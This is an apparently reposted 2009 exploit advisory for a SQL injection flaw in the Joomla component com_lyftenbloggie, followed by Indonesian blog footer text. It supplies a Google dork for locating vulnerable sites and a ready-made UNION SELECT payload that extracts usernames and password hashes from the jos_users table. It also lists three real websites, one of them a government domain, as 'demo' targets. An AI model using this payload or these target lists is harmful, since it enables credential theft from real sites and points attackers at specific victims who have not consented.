################################################## ##########
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
################################################## ##########
[ Dork ]
inurl:com_lyftenbloggie
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]
[ Exploit ]
62+union+select+1,concat_ws(0x3a,username,password ),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_user s--
[ Demo ]
http://www.bertam.com.my/index.php?option=com_lyftenbloggie&author=Xploit
http://www.uesp.gov.co/uaesp_jo/index.php?option=com_lyftenbloggie&author=Xploit
http://www.frasernet.org/index.php?option=com_lyftenbloggie&author=Xploit
Jumat, 19 Maret 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar